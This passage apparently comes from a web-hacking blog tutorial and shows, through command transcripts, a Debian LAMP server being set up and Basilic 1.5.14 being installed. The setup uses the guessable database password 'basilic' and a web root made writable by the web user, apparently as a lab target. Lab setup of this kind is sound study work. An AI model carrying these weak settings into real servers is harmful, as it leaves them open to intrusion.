mysql-server-5.5 (from .../mysql-server-5.5_5.5.37-0+wheezy1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5-common./span/span span class="code-line"span class="go"Unpacking php5-common (from .../php5-common_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libonig2./span/span span class="code-line"span class="go"Unpacking libonig2 (from .../libonig2_5.9.1-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libqdbm14./span/span span class="code-line"span class="go"Unpacking libqdbm14 (from .../libqdbm14_1.8.78-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5-cli./span/span span class="code-line"span class="go"Unpacking php5-cli (from .../php5-cli_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libapr1./span/span span class="code-line"span class="go"Unpacking libapr1 (from .../libapr1_1.4.6-3+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libaprutil1./span/span span class="code-line"span class="go"Unpacking libaprutil1 (from .../libaprutil1_1.4.1-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libaprutil1-dbd-sqlite3./span/span span class="code-line"span class="go"Unpacking libaprutil1-dbd-sqlite3 (from .../libaprutil1-dbd-sqlite3_1.4.1-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libaprutil1-ldap./span/span span class="code-line"span class="go"Unpacking libaprutil1-ldap (from .../libaprutil1-ldap_1.4.1-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2.2-bin./span/span span class="code-line"span class="go"Unpacking apache2.2-bin (from .../apache2.2-bin_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2-utils./span/span span class="code-line"span class="go"Unpacking apache2-utils (from .../apache2-utils_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2.2-common./span/span span class="code-line"span class="go"Unpacking apache2.2-common (from .../apache2.2-common_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2-mpm-prefork./span/span span class="code-line"span class="go"Unpacking apache2-mpm-prefork (from .../apache2-mpm-prefork_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libapache2-mod-php5./span/span span class="code-line"span class="go"Unpacking libapache2-mod-php5 (from .../libapache2-mod-php5_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5-mysql./span/span span class="code-line"span class="go"Unpacking php5-mysql (from .../php5-mysql_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2./span/span span class="code-line"span class="go"Unpacking apache2 (from .../apache2_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libhtml-template-perl./span/span span class="code-line"span class="go"Unpacking libhtml-template-perl (from .../libhtml-template-perl_2.91-1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package mysql-server./span/span span class="code-line"span class="go"Unpacking mysql-server (from .../mysql-server_5.5.37-0+wheezy1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5./span/span span class="code-line"span class="go"Unpacking php5 (from .../php5_5.4.4-14+deb7u10_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package ssl-cert./span/span span class="code-line"span class="go"Unpacking ssl-cert (from .../ssl-cert_1.0.32_all.deb) .../span/span span class="code-line"span class="go"Processing triggers for man-db .../span/span span class="code-line"span class="go"Setting up libaio1:amd64 (0.3.109-3) .../span/span span class="code-line"span class="go"Setting up libnet-daemon-perl (0.48-1) .../span/span span class="code-line"span class="go"Setting up libplrpc-perl (0.2020-2) .../span/span span class="code-line"span class="go"Setting up libdbi-perl (1.622-1) .../span/span span class="code-line"span class="go"Setting up libdbd-mysql-perl (4.021-1+b1) .../span/span span class="code-line"span class="go"Setting up mysql-client-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up mysql-server-core-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up mysql-server-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"[ ok ] Stopping MySQL database server: mysqld./span/span span class="code-line"span class="go"140602 16:38:39 [Warning] Using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release. Please use the full name instead./span/span span class="code-line"span class="go"140602 16:38:39 [Warning] Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead./span/span span class="code-line"span class="go"140602 16:38:39 [Note] Plugin #39;FEDERATED#39; is disabled./span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: The InnoDB memory heap is disabled/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Mutexes and rw_locks use GCC atomic builtins/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Compressed tables use zlib 1.2.7/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Using Linux native AIO/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Initializing buffer pool, size = 128.0M/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Completed initialization of buffer pool/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: highest supported file format is Barracuda./span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Waiting for the background threads to start/span/span span class="code-line"span class="go"140602 16:38:40 InnoDB: 5.5.37 started; log sequence number 1595675/span/span span class="code-line"span class="go"140602 16:38:40 InnoDB: Starting shutdown.../span/span span class="code-line"span class="go"140602 16:38:41 InnoDB: Shutdown completed; log sequence number 1595675/span/span span class="code-line"span class="go"[ ok ] Starting MySQL database server: mysqld ../span/span span class="code-line"span class="go"[info] Checking for tables which need an upgrade, are corrupt or were /span/span span class="code-line"span class="go"not closed cleanly../span/span span class="code-line"span class="go"Setting up php5-common (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/pdo.ini with new version/span/span span class="code-line"span class="go"Setting up libonig2 (5.9.1-1) .../span/span span class="code-line"span class="go"Setting up libqdbm14 (1.8.78-2) .../span/span span class="code-line"span class="go"Setting up php5-cli (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/cli/php.ini with new version/span/span span class="code-line"span class="go"update-alternatives: using /usr/bin/php5 to provide /usr/bin/php (php) in auto mode/span/span span class="code-line"span class="go"Setting up libapr1 (1.4.6-3+deb7u1) .../span/span span class="code-line"span class="go"Setting up libaprutil1 (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up libaprutil1-dbd-sqlite3 (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up libaprutil1-ldap (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up apache2.2-bin (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up apache2-utils (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up apache2.2-common (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Enabling site default./span/span span class="code-line"span class="go"Enabling module alias./span/span span class="code-line"span class="go"Enabling module autoindex./span/span span class="code-line"span class="go"Enabling module dir./span/span span class="code-line"span class="go"Enabling module env./span/span span class="code-line"span class="go"Enabling module mime./span/span span class="code-line"span class="go"Enabling module negotiation./span/span span class="code-line"span class="go"Enabling module setenvif./span/span span class="code-line"span class="go"Enabling module status./span/span span class="code-line"span class="go"Enabling module auth_basic./span/span span class="code-line"span class="go"Enabling module deflate./span/span span class="code-line"span class="go"Enabling module authz_default./span/span span class="code-line"span class="go"Enabling module authz_user./span/span span class="code-line"span class="go"Enabling module authz_groupfile./span/span span class="code-line"span class="go"Enabling module authn_file./span/span span class="code-line"span class="go"Enabling module authz_host./span/span span class="code-line"span class="go"Enabling module reqtimeout./span/span span class="code-line"span class="go"Setting up apache2-mpm-prefork (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"[....] Starting web server: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". ok /span/span span class="code-line"span class="go"Setting up libapache2-mod-php5 (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/apache2/php.ini with new version/span/span span class="code-line"span class="go"[....] Restarting web server: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go" ... waiting apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". ok /span/span span class="code-line"span class="go"Setting up php5-mysql (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/mysql.ini with new version/span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/mysqli.ini with new version/span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/mods-available/pdo_mysql.ini with new version/span/span span class="code-line"span class="go"Setting up apache2 (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up libhtml-template-perl (2.91-1) .../span/span span class="code-line"span class="go"Setting up mysql-server (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up php5 (5.4.4-14+deb7u10) .../span/span span class="code-line"span class="go"Setting up ssl-cert (1.0.32) .../span/span span class="code-line"span class="go"Processing triggers for libapache2-mod-php5 .../span/span span class="code-line"span class="go"[....] Reloading web server config: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". ok /span/span span class="code-line"/code/pre/div /td/tr/table pNow that LAMP is installed we can download and install the application, first download the source from the link on a href="http://artis.imag.fr/Software/Basilic/" target="_blank"their website/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanspan class="nb"cd/span /var/www//span span class="code-line"span class="gp"[email protected]:/var/www# /spanwget http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz/span span class="code-line"span class="go"--2014-06-02 16:41:18-- http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz/span/span span class="code-line"span class="go"Resolving artis.imag.fr (artis.imag.fr)... 194.199.18.202/span/span span class="code-line"span class="go"Connecting to artis.imag.fr (artis.imag.fr)|194.199.18.202|:80... connected./span/span span class="code-line"span class="go"HTTP request sent, awaiting response... 200 OK/span/span span class="code-line"span class="go"Length: 455554 (445K) [application/x-gzip]/span/span span class="code-line"span class="go"Saving to: `basilic-1.5.14.tar.gz#39;/span/span span class="code-line"/span span class="code-line"span class="go"100%[==============================================================================================gt;] 455,554 1.13M/s in 0.4s /span/span span class="code-line"/span span class="code-line"span class="go"2014-06-02 16:41:18 (1.13 MB/s) - `basilic-1.5.14.tar.gz#39; saved [455554/455554]/span/span span class="code-line"/span span class="code-line"span class="gp"[email protected]:/var/www# /spantar vxzf basilic-1.5.14.tar.gz /span span class="code-line"span class="go"basilic-1.5.14//span/span span class="code-line"span class="go"basilic-1.5.14/configure/span/span span class="code-line"span class="go"basilic-1.5.14/CSS//span/span span class="code-line"span class="go"basilic-1.5.14/CSS/basilic.css/span/span span class="code-line"span class="go"basilic-1.5.14/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/publi.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/backoffice.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/listpubli.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/basilic.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/CSS/header.css/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/getLanguage.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/index.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/footer.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/publiUtils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/setLanguage.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/publi.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/updatePubliDocs.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/utils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/header.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Public/search.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/updatePubliDocs.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/basilic.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/utils.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/authorAction.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/author.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Authors/menuAuthor.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/cnrs.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/commonMenu.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/intro.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/index.html/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/menuPubli.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/updatePublis.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/publi.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Publications/publiAction.php/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images//span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images/import.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/Images/export.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Sources/Intranet/usersguide.html/span/span span class="code-line"span class="go"basilic-1.5.14/INSTALL/span/span span class="code-line"span class="go"basilic-1.5.14/Public//span/span span class="code-line"span class="go"basilic-1.5.14/Import//span/span span class="code-line"span class="go"basilic-1.5.14/Import/_pyxdkbibtex.so/span/span span class="code-line"span class="go"basilic-1.5.14/Import/libxdkbibtex.so.1/span/span span class="code-line"span class="go"basilic-1.5.14/Import/bibtex2table/span/span span class="code-line"span class="go"basilic-1.5.14/Import/pyxdkbibtex.py/span/span span class="code-line"span class="go"basilic-1.5.14/Intranet//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Authors//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Publications//span/span span class="code-line"span class="go"basilic-1.5.14/Intranet/Images//span/span span class="code-line"span class="go"basilic-1.5.14/install.html/span/span span class="code-line"span class="go"basilic-1.5.14/Config//span/span span class="code-line"span class="go"basilic-1.5.14/Config/tables.txt/span/span span class="code-line"span class="go"basilic-1.5.14/Config/include.php/span/span span class="code-line"span class="go"basilic-1.5.14/Config/install.html/span/span span class="code-line"span class="go"basilic-1.5.14/Config/checkConfig.php/span/span span class="code-line"span class="go"basilic-1.5.14/Config/diff.php/span/span span class="code-line"span class="go"basilic-1.5.14/LICENCE/span/span span class="code-line"span class="go"basilic-1.5.14/CHANGELOG/span/span span class="code-line"span class="go"basilic-1.5.14/README/span/span span class="code-line"span class="go"basilic-1.5.14/Images//span/span span class="code-line"span class="go"basilic-1.5.14/Images/ppt.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbImgHover.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/apache.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/en.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbMovie.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorUP.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbMovieHover.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/defaultThumb.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Images/empty.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/required.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorADD.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/search.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/php.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorDEL.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/updatePubli.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/thumbImg.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/mySQL.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/pdf.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/basilic.jpg/span/span span class="code-line"span class="go"basilic-1.5.14/Images/chercher.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/fr.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/basilic.ico/span/span span class="code-line"span class="go"basilic-1.5.14/Images/ps.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/editPubli.png/span/span span class="code-line"span class="go"basilic-1.5.14/Images/authorDOWN.png/span/span span class="code-line"span class="go"basilic-1.5.14/usersguide.html/span/span span class="code-line"/code/pre/div /td/tr/table pNow browsing to the install.html file we get the final installation instructions. It tells us we need to run code./configure/code in the basilic directory, but before we do this we have to edit the codeconfigure/code script to set the mysql username and password for both codeintranet/code and codepublic/code to codebasilic/code, after that we can run it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www# /spanspan class="nb"cd/span basilic-1.5.14//span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /span./configure /span span class="code-line"span class="go"Filtering files...done/span/span span class="code-line"/span span class="code-line"span class="go"Open checkConfig.php in your browser to check your configuration options./span/span span class="code-line"/span span class="code-line"span class="go"Make sure you access this file through your web server using an URL like/span/span span class="code-line"span class="go"http://your-server/path/to/basilic-1.5.14/checkConfig.php/span/span span class="code-line"span class="gp gp-VirtualEnv"(and not as a file://...)/span span class="go"so that php scripts get interpreted./span/span span class="code-line"/code/pre/div /td/tr/table pBrowse to the codecheckConfig.php/code script:/p pimg src="/assets/images/web-hacking/basilic-checkconfig.png" width="750" height="500"/p pLooks good, now for the database:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanmysql -uroot -p/span span class="code-line"span class="go"Enter password: /span/span span class="code-line"span class="go"Welcome to the MySQL monitor. Commands end with ; or \g./span/span span class="code-line"span class="go"Your MySQL connection id is 43/span/span span class="code-line"span class="go"Server version: 5.5.37-0+wheezy1 (Debian)/span/span span class="code-line"/span span class="code-line"span class="go"Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved./span/span span class="code-line"/span span class="code-line"span class="go"Oracle is a registered trademark of Oracle Corporation and/or its/span/span span class="code-line"span class="go"affiliates. Other names may be trademarks of their respective/span/span span class="code-line"span class="go"owners./span/span span class="code-line"/span span class="code-line"span class="go"Type #39;help;#39; or #39;\h#39; for help. Type #39;\c#39; to clear the current input statement./span/span span class="code-line"/span span class="code-line"span class="go"mysqlgt; CREATE DATABASE basilic;/span/span span class="code-line"span class="go"Query OK, 1 row affected (0.01 sec)/span/span span class="code-line"/span span class="code-line"span class="go"mysqlgt; GRANT SELECT,INSERT,UPDATE,DELETE ON basilic.* TO #39;basilic#39;@#39;localhost#39; IDENTIFIED BY #39;basilic#39;;/span/span span class="code-line"span class="go"Query OK, 0 rows affected (0.00 sec)/span/span span class="code-line"/span span class="code-line"span class="go"mysqlgt; flush privileges;/span/span span class="code-line"span class="go"Query OK, 0 rows affected (0.00 sec)/span/span span class="code-line"/span span class="code-line"span class="go"mysqlgt; quit/span/span span class="code-line"span class="go"Bye/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spanmysql -u root -p basilic lt; Config/tables.txt /span span class="code-line"span class="go"Enter password: /span/span span class="code-line"span class="go"ERROR 1064 (42000) at line 31: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near #39;TYPE=MyISAM#39; at line 8/span/span span class="code-line"/code/pre/div /td/tr/table pClearly there is an issue with the codetables.txt/code file, it seems to be putting codeTYPE=MyISAM/code as the table type on creation, that can be fixed easy enough as MyISAM is the default table type we can just remove this part from the file:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spancat Config/tables.txt span class="p"|/span sed span class="s1"#39;s/ TYPE=MyISAM//g#39;/span gt; Config/tables.txt.new/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spanmysql -u root -p basilic lt; Config/tables.txt.new /span span class="code-line"span class="go"Enter password: /span/span span class="code-line"/code/pre/div /td/tr/table pNow the database is set up. we'll have a look at the codecheckConfig.php/code script again:/p pimg src="/assets/images/web-hacking/basilic-checkconfig2.png" width="750" height="500"/p pWe still need to install imagemagik's codeconvert/code application and make the web root writable by the web user:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span 